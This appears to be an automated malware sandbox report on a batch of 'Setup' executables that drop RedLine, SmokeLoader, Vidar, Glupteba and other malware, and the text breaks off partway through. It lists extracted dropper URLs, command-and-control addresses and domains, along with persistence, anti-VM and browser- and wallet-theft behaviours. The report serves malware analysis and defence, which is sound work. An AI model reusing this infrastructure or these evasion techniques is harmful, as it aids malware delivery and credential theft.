Overview
overview
10Static
static
Setup (1).exe
windows7_x64
10Setup (1).exe
windows10_x64
10Setup (10).exe
windows7_x64
10Setup (10).exe
windows10_x64
10Setup (11).exe
windows7_x64
10Setup (11).exe
windows10_x64
10Setup (12).exe
windows7_x64
10Setup (12).exe
windows10_x64
10Setup (13).exe
windows7_x64
10Setup (13).exe
windows10_x64
10Setup (14).exe
windows7_x64
10Setup (14).exe
windows10_x64
10Setup (15).exe
windows7_x64
10Setup (15).exe
windows10_x64
10Setup (16).exe
windows7_x64
10Setup (16).exe
windows10_x64
10Setup (17).exe
windows7_x64
10Setup (17).exe
windows10_x64
10Setup (18).exe
windows7_x64
10Setup (18).exe
windows10_x64
10Setup (19).exe
windows7_x64
10Setup (19).exe
windows10_x64
10Setup (2).exe
windows7_x64
10Setup (2).exe
windows10_x64
10Setup (20).exe
windows7_x64
10Setup (20).exe
windows10_x64
10Setup (21).exe
windows7_x64
10Setup (21).exe
windows10_x64
10Setup (22).exe
windows7_x64
10Setup (22).exe
windows10_x64
10Setup (23).exe
windows7_x64
10Setup (23).exe
windows10_x64
10Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
1807s -
max time network
1823s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
21-08-2021 10:21
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win7v20210410
gluptebametasploitredlinevidar19.0820_8_rsdibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderspywarestealerthemidatrojanupx
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Setup (1).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidarzloader20_8_rs937second_7.5kwwwbackdoorbotnetdiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral3
Sample
Setup (10).exe
Resource
win7v20210410
redlinevidar20_8_rs937@gerhdhddibildsecond_7.5kwwwdiscoveryevasioninfostealerspywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral4
Sample
Setup (10).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar937second_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral5
Sample
Setup (11).exe
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral6
Sample
Setup (11).exe
Resource
win10v20210408
gluptebametasploitredlinesmokeloadersocelarsvidar19.0820_8_rs937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral7
Sample
Setup (12).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadervidar20_8_rs3937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderstealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral8
Sample
Setup (12).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral9
Sample
Setup (13).exe
Resource
win7v20210408
redlinesmokeloader19.0820_8_rs@gerhdhddibildsecond_7.5kwwwbackdoordiscoveryevasioninfostealerspywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral10
Sample
Setup (13).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.0820_8_rs937@gerhdhdsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral11
Sample
Setup (14).exe
Resource
win7v20210408
gluptebametasploitredlinesmokeloadervidar19.0820_8_rs3937@gerhdhddibildsecond_7.5kwwwbackdoordropperevasioninfostealerloaderstealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral12
Sample
Setup (14).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.0820_8_rsdibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral13
Sample
Setup (15).exe
Resource
win7v20210408
gluptebametasploitredlinevidar19.0820_8_rs3@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderstealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral14
Sample
Setup (15).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.08937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral15
Sample
Setup (16).exe
Resource
win7v20210410
redlinevidar19.08517@gerhdhddibildsecond_7.5kwwwdiscoveryevasioninfostealerpersistenceransomwarespywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral16
Sample
Setup (16).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.0820_8_rs937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral17
Sample
Setup (17).exe
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral18
Sample
Setup (17).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar937second_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral19
Sample
Setup (18).exe
Resource
win7v20210410
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral20
Sample
Setup (18).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.0820_8_rs937dibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral21
Sample
Setup (19).exe
Resource
win7v20210410
gluptebametasploitredlinevidar937second_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderspywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral22
Sample
Setup (19).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar19.08937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral23
Sample
Setup (2).exe
Resource
win7v20210410
gluptebametasploitredlinesmokeloadervidar19.0820_8_rs937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderstealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral24
Sample
Setup (2).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesmokeloadervidar19.0820_8_rs937@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral25
Sample
Setup (20).exe
Resource
win7v20210408
gluptebametasploitredlinesmokeloadervidar20_8_rs517@gerhdhddibildsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceransomwarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral26
Sample
Setup (20).exe
Resource
win10v20210410
gluptebametasploitnetsupportredlinesocelarsvidar19.0820_8_rs937second_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral27
Sample
Setup (21).exe
Resource
win7v20210408
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral28
Sample
Setup (21).exe
Resource
win10v20210410
netsupportredlinesmokeloadersocelarsvidar19.0820_8_rs@gerhdhdsecond_7.5kwwwbackdoordiscoveryevasioninfostealerpersistenceratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral29
Sample
Setup (22).exe
Resource
win7v20210410
gluptebametasploitredlinevidar19.083937@gerhdhdsecond_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistencespywarestealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral30
Sample
Setup (22).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidarzloader937@gerhdhddibildsecond_7.5kwwwbackdoorbotnetdiscoverydropperevasioninfostealerloaderpersistenceransomwareratspywarestealerthemidatrojan
windows10_x64
0 signatures
0 seconds
Behavioral task
behavioral31
Sample
Setup (23).exe
Resource
win7v20210410
redlinesmokeloadervidar19.083916937@gerhdhddibildsecond_7.5kwwwbackdoordiscoveryevasioninfostealerstealerthemidatrojan
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral32
Sample
Setup (23).exe
Resource
win10v20210408
gluptebametasploitnetsupportredlinesmokeloadersocelarsvidar20_8_rs937second_7.5kwwwbackdoordiscoverydropperevasioninfostealerloaderpersistenceratspywarestealerthemidatrojanupx
windows10_x64
0 signatures
0 seconds
General
-
Target
Setup (19).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://dl.uploadgram.me/6120bc6269f31h?raw
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://dl.uploadgram.me/6120bcfeb5393h?raw
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://dl.uploadgram.me/6120c8f91373ch?raw
Extracted
Family
redline
Botnet
Second_7.5K
C2
45.14.49.200:27625
Extracted
Family
redline
Botnet
www
C2
185.204.109.146:54891
Extracted
Family
redline
Botnet
dibild
C2
135.148.139.222:33569
Extracted
Family
redline
Botnet
19.08
C2
95.181.172.100:6795
Extracted
Family
smokeloader
Version
2020
C2
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
rc4.i32
rc4.i32
Extracted
Family
redline
Botnet
@Gerhdhd
C2
46.8.19.177:41228
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
vidar
Version
40.1
Botnet
937
C2
https://eduarroma.tumblr.com/
Attributes
-
profile_id
937
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral22/memory/4028-302-0x0000000004900000-0x0000000005226000-memory.dmp family_glupteba behavioral22/memory/4028-311-0x0000000000400000-0x00000000027DB000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5128 2268 rundll32.exe 136 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7756 2268 rundll32.exe 136 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 8736 2268 rundll32.exe 136 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6724 2268 rundll32.exe 136 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 11 IoCs
resource yara_rule behavioral22/files/0x000100000001ab58-123.dat family_redline behavioral22/files/0x000100000001ab51-124.dat family_redline behavioral22/files/0x000100000001ab58-162.dat family_redline behavioral22/files/0x000100000001ab51-160.dat family_redline behavioral22/memory/4380-238-0x0000000000418E52-mapping.dmp family_redline behavioral22/memory/4380-232-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral22/memory/4360-231-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral22/memory/4360-287-0x0000000005010000-0x000000000550E000-memory.dmp family_redline behavioral22/memory/4564-273-0x0000000000418F7A-mapping.dmp family_redline behavioral22/memory/4396-241-0x0000000000418F76-mapping.dmp family_redline behavioral22/memory/4396-235-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 4736 created 4612 4736 WerFault.exe 109 PID 1220 created 4512 1220 WerFault.exe 129 PID 6064 created 508 6064 WerFault.exe 102 PID 5864 created 6248 5864 WerFault.exe 217 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 7200 created 4028 7200 svchost.exe 99 PID 7200 created 6532 7200 svchost.exe 214 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral22/memory/508-393-0x0000000004820000-0x00000000048BD000-memory.dmp family_vidar behavioral22/memory/508-403-0x0000000000400000-0x0000000002D0E000-memory.dmp family_vidar -
Blocklisted process makes network request 7 IoCs
flow pid Process 453 8600 powershell.exe 453 8600 powershell.exe 472 4240 MsiExec.exe 472 4240 MsiExec.exe 578 5372 powershell.exe 596 2320 powershell.exe 598 2320 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts Conhost.exe File opened for modification C:\Windows\System32\drivers\SET1C7E.tmp mask_svc.exe File created C:\Windows\System32\drivers\SET1C7E.tmp mask_svc.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys mask_svc.exe -
Executes dropped EXE 64 IoCs
pid Process 4052 uwtBY5_fgfWhsQUfzRGn9ts8.exe 1184 Jehn52WtbMKZ9kxobh4J4A03.exe 2264 MCy69zYoC6A83qNV7PWC49cY.exe 2852 IvXEuwW59N_cXWlDbgjIyNx7.exe 2152 gdCjIZ3vQLrTFWKdOezjL1wn.exe 3336 WgAQMBbuvnZa4Uim1cKe4vXj.exe 3676 tfmFgK9w71TpTpJqhUlQRQle.exe 4044 4g9oUp8jAFefeykFTkbWSBy4.exe 3820 H_GAN4lymZYNIe2SYb1o6PjL.exe 2136 0NKIqxJZOxkSqcoqQk5gff41.exe 2160 Bl4aeKqISbgmfj5TPTrnlG3E.exe 4028 oYJ4oarMVlCEKSuYDbZ6GPPw.exe 2624 qhRWdCBRrOEeIDbo7QDZo256.exe 3492 9V6mnXHdynq1s7PpT244URZa.exe 508 Ls6HCRy7CjYIm6XRO_DMyU5M.exe 4360 tfmFgK9w71TpTpJqhUlQRQle.exe 4492 MWJd3mPPIlWyLa2RpIzVqQrH.exe 4388 IvXEuwW59N_cXWlDbgjIyNx7.exe 4380 MCy69zYoC6A83qNV7PWC49cY.exe 4396 gdCjIZ3vQLrTFWKdOezjL1wn.exe 4612 5vpgJBjyfbnbMk1YeKUgbWC8.exe 4672 yY2qmC4iOLBQc_v9oIAFRu3F.exe 4564 IvXEuwW59N_cXWlDbgjIyNx7.exe 4948 Xdb1fFnJhrYC1plDJxt3VPoy.exe 5032 MediaBurner2.tmp 492 8md1vxAwe7Y0ndRiBYaafLjk.exe 184 DvMwGNgUky7bXWwCd2_zhu5C.exe 4372 DvMwGNgUky7bXWwCd2_zhu5C.tmp 3572 4726380.exe 1996 7300426.exe 4468 2310645.exe 4832 jooyu.exe 5040 md8_8eus.exe 4512 customer3.exe 3180 jfiag3g_gg.exe 4716 WinHoster.exe 4444 Setup.exe 2188 11111.exe 5884 LGCH2-401_2021-08-18_14-40.exe 5912 jfiag3g_gg.exe 5952 Inlog.exe 6016 11111.exe 6008 Cleaner Installation.exe 6068 WEATHER Manager.exe 6108 VPN.exe 5192 md7_7dfj.exe 5280 Inlog.tmp 5360 askinstall53.exe 5420 Setup.exe 5540 WEATHER Manager.tmp 5560 PBrowFile15.exe 5636 msiexec.exe 5616 VPN.tmp 5684 LivelyScreenRecS1.9.exe 2072 xtect12.exe 5032 MediaBurner2.tmp 5524 11111.exe 5356 11111.exe 4520 zhaoy-game.exe 5020 5918109.exe 5744 4164647.exe 6240 4278010.exe 6276 Conhost.exe 6320 4417789.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0NKIqxJZOxkSqcoqQk5gff41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9V6mnXHdynq1s7PpT244URZa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8md1vxAwe7Y0ndRiBYaafLjk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion R4FS14llhaVLNhuh_1UBG_AQ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion vwqOzdi1PVwJK8OTScrNyxPr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CE4F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WgAQMBbuvnZa4Uim1cKe4vXj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9V6mnXHdynq1s7PpT244URZa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8md1vxAwe7Y0ndRiBYaafLjk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion R4FS14llhaVLNhuh_1UBG_AQ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6UIpSNXQ6X1bGK6xwzbZrjMo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6UIpSNXQ6X1bGK6xwzbZrjMo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WgAQMBbuvnZa4Uim1cKe4vXj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0NKIqxJZOxkSqcoqQk5gff41.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Od44Rf8EHJH4T2sW1PLJmC6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CE4F.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Od44Rf8EHJH4T2sW1PLJmC6c.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion vwqOzdi1PVwJK8OTScrNyxPr.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Weather.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Setup (19).exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation xtect12.exe Key value queried \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation Gaemataeshani.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url Esplorarne.exe.com -
Loads dropped DLL 64 IoCs
pid Process 4372 DvMwGNgUky7bXWwCd2_zhu5C.tmp 4372 DvMwGNgUky7bXWwCd2_zhu5C.tmp 5148 rundll32.exe 6008 Cleaner Installation.exe 5540 WEATHER Manager.tmp 5540 WEATHER Manager.tmp 5280 Inlog.tmp 5280 Inlog.tmp 5616 VPN.tmp 5616 VPN.tmp 5032 MediaBurner2.tmp 508 Ls6HCRy7CjYIm6XRO_DMyU5M.exe 508 Ls6HCRy7CjYIm6XRO_DMyU5M.exe 7324 Setup.exe 7664 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 8052 Setup.tmp 7492 eHGLHEnRYqK4VhmYDOUgPfia.tmp 7492 eHGLHEnRYqK4VhmYDOUgPfia.tmp 5580 Esplorarne.exe.com 5868 MsiExec.exe 5868 MsiExec.exe 5868 MsiExec.exe 8484 GameBoxWin64.exe 8484 GameBoxWin64.exe 6948 rundll32.exe 6312 MsiExec.exe 6312 MsiExec.exe 8484 GameBoxWin64.exe 6808 MsiExec.exe 6808 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 6452 rundll32.exe 4240 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 4240 MsiExec.exe 8416 svrwebui.exe 8416 svrwebui.exe 8416 svrwebui.exe 8416 svrwebui.exe 8416 svrwebui.exe 8416 svrwebui.exe 5152 mask_svc.exe 5152 mask_svc.exe 5152 mask_svc.exe 5152 mask_svc.exe 5152 mask_svc.exe 5152 mask_svc.exe 8052 Setup.tmp 8052 Setup.tmp 9124 Weather_Installation.exe 9124 Weather_Installation.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral22/files/0x000100000001ab5c-138.dat themida behavioral22/files/0x000100000001ab55-128.dat themida behavioral22/files/0x000100000001ab63-147.dat themida behavioral22/files/0x000100000001ab63-166.dat themida behavioral22/files/0x000100000001ab55-157.dat themida behavioral22/files/0x000100000001ab5c-154.dat themida behavioral22/memory/3492-203-0x00000000012B0000-0x00000000012B1000-memory.dmp themida behavioral22/memory/2136-200-0x0000000000E20000-0x0000000000E21000-memory.dmp themida behavioral22/memory/3336-198-0x0000000000250000-0x0000000000251000-memory.dmp themida behavioral22/files/0x000100000001ab73-299.dat themida behavioral22/files/0x000100000001ab73-306.dat themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Weather_Installation.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Weather = "C:\\Users\\Admin\\AppData\\Roaming\\Weather\\Weather.exe --Ac4FtzsAeC" Weather_Installation.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ApplicationName = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\ApplicationName = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker.exe" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7300426.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Molaraxepae.exe\"" Conhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CE4F.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WgAQMBbuvnZa4Uim1cKe4vXj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 0NKIqxJZOxkSqcoqQk5gff41.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8md1vxAwe7Y0ndRiBYaafLjk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA R4FS14llhaVLNhuh_1UBG_AQ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA vwqOzdi1PVwJK8OTScrNyxPr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RuntimeBroker.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9V6mnXHdynq1s7PpT244URZa.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6UIpSNXQ6X1bGK6xwzbZrjMo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Od44Rf8EHJH4T2sW1PLJmC6c.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\R: Cleaner Installation.exe File opened (read-only) \??\E: Setup.exe File opened (read-only) \??\H: Setup.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\F: Setup.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: GameBoxWin64.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\P: Cleaner Installation.exe File opened (read-only) \??\O: Setup.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\J: GameBoxWin64.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\N: Cleaner Installation.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\Z: Setup.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\B: Setup.exe File opened (read-only) \??\N: GameBoxWin64.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: Cleaner Installation.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\F: 